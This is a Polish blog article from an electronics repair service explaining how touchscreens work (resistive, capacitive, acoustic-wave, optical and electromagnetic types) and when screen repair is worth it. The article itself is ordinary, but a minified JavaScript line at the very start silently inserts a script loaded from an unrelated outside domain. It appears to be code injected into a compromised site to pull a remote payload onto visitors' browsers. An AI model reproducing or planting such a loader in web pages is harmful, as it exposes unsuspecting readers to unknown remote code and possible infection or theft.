;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Jak działa ekran dotykowy i czy warto go naprawiać? | Silico-Bit
Technologia dotykowego ekranu nie jest już dla nikogo żadnym zaskoczeniem. Nie zastanawiamy się zazwyczaj na czym polega, a to dość ważna kwestia, ponieważ jest związana z ewentualnymi naprawami. Bowiem rodzajów technologii dotykowego ekranu jest kilka. Warto więc wiedzieć, która z nich dotyczy naszego urządzenia. Z tego artykułu dowiesz się również, czy warto naprawiać ekran dotykowy w uszkodzonym sprzęcie.

Jak działa ekran dotykowy w urządzeniach?

Panel dotykowy to ten element wyposażenia urządzeń, który pozwala wejść użytkownikowi w bezpośrednią interakcję ze sprzętem, za pomocą dotyku. Ekran ten rozpoznaje dotyk użytkownika i dostosowuje pracę urządzenia do wykonanej lub zleconej czynności, poprzez wbudowane w ekran sensory. Umożliwiają one wydawanie urządzeniom różnorodnych poleceń i instrukcji.

Dotykowe ekrany otaczają nas zewsząd. Możemy je spotkać w smartfonach, laptopach, konsolach do gier, tabletach, nawigacjach samochodowych, a nawet biletomatach i bankomatach. Muszą one spełniać naprawdę pokaźny zakres wymogów, w zależności od swojego zastosowania. Każde urządzenie charakteryzuje się innym zakresem i w zależności od jakości sprzętu, panel dotykowy może działać szybciej lub wolniej.

Przypomnijmy sobie duże ekrany nawigacyjne w centrach handlowych. Jakże ułatwiają nam one znalezienie odpowiedniego miejsca za pomocą kilku dotknięć. Jakim utrudnieniem byłoby wówczas korzystanie z podręcznej mapki, i chodzenie po wyznaczonej ścieżce. Na szczęście ekrany dotykowe zawładnęły większymi i mniejszymi miastami, ułatwiając tym samym życie wielu ludzi. Jednak spełniają one swoje funkcje pod warunkiem, że posiadają kilka podstawowych cech.

Kiosk nawigacyjny

Co powinien oferować nam ekran dotykowy?

Aby spełnić oczekiwania konsumentów, panel dotykowy powinien spełniać kilka bardzo ważnych aspektów, które determinują zadowolenie oraz komfort użytkowania urządzenia. Są to m.in.:

  • szybkość reakcji;
  • dokładność dotyku;
  • wytrzymałość ekranu;
  • czytelność obrazu.

Nie bylibyśmy w stanie korzystać z ekranu, którego obraz byłby zamazany, a szybkość reakcji byłaby mocno opóźniona. Nie mielibyśmy wówczas zaufania do takiego sprzętu.

Ekran dotykowy – czy warto go naprawiać?

Jeśli wiemy już, jak działa ekran dotykowy, zastanówmy się co zrobić, gdy zauważymy pewne problemy z jego funkcjonowaniem. Różnego rodzaju awarie mogą doprowadzać do spowolnienia sprzętu, a przede wszystkim wydłużenia czasu reakcji. Niekiedy panel dotykowy całkowicie przestaje odbierać bodźce, a ekran przestaje być czytelny. Jeśli sprzęt nie posiada klawiszy, którymi możemy w ostateczności zastąpić dotyk, korzystanie z niego nie będzie w ogóle możliwe. Co zrobić w takiej sytuacji?

Jak działa ekran dotykowy – podstawowa wiedza przed dokonaniem naprawy!

Z pewnością poradzenie sobie z taką awarią samodzielne nie byłoby możliwe, choćby ze względu na ograniczoną wiedzę i brak odpowiedniego sprzętu, którym można naprawić urządzenie. W tym przypadku najlepszym rozwiązaniem będzie wyspecjalizowany serwis sprzętu, który oceni awarię i sposób naprawy. Aby oto zrobić należy jednak wiedzieć, w jaka technologia została zastosowana w danym panelu dotykowym, bowiem możemy wyróżnić ich kilka:

  • rezystancyjna – polega na wykryciu zmian nacisku, dzięki dwóm elektrodom znajdującym się w dwóch warstwach: warstwie ekranu i warstwie elektrody. Po dotknięciu ekranu stykają się one tworząc zwarcie, które w rezultacie umożliwia przepływ prądu między nimi. W ten sposób ekran identyfikuje dotyk;
  • pojemnościowa – miejsce dotyku jest określane przez sensory, wykrywające niewielkie zmiany w natężeniu prądu elektrycznego, generowanego przez kontakt z palcem;
  • efekt fali akustycznej – wykrywają dotyk dzięki pomiarowi tłumienia fali ultradźwiękowej, rozchodzącej się po powierzchni;
  • optyczna – rozpoznawanie dotyku jest możliwe dzięki dwóm podczerwonym diodom LED, umieszczonym w górnym, lewym i prawym rogu panelu oraz sensorowi optycznemu, czyli kamerze. Podczas dotyku czujnik rejestruje cień, który wynika z zablokowania światła podczerwonego i określa współrzędne miejsca nacisku;
  • indukcja elektromagnetyczna – ta technologia powstała na potrzeby tabletów graficznych i jest niezwykle czuła na dotyk specjalnego stylusa. Generuje on pole magnetyczne, a sensory odbierające energię elektromagnetyczną, mogą określić jego pozycję.

Jak działa ekran dotykowy?

Jeżeli serwis określi już zastosowaną technologię wykrywania dotyku, w łatwy sposób oceni możliwości oraz koszty naprawy takiego ekranu. Oczywiście wizyta w serwisie nie jest konieczna w przypadku np. laptopa z ekranem dotykowym, który posiada dodatkowo touchpad oraz klawisze. Korzystanie z niego nie będzie co prawda tak komfortowe jak wcześniej, ale jak najbardziej możliwe. Jednak w przypadku tabletu czy smartfona, wymiana lub naprawa ekranu wydaje się być koniecznością.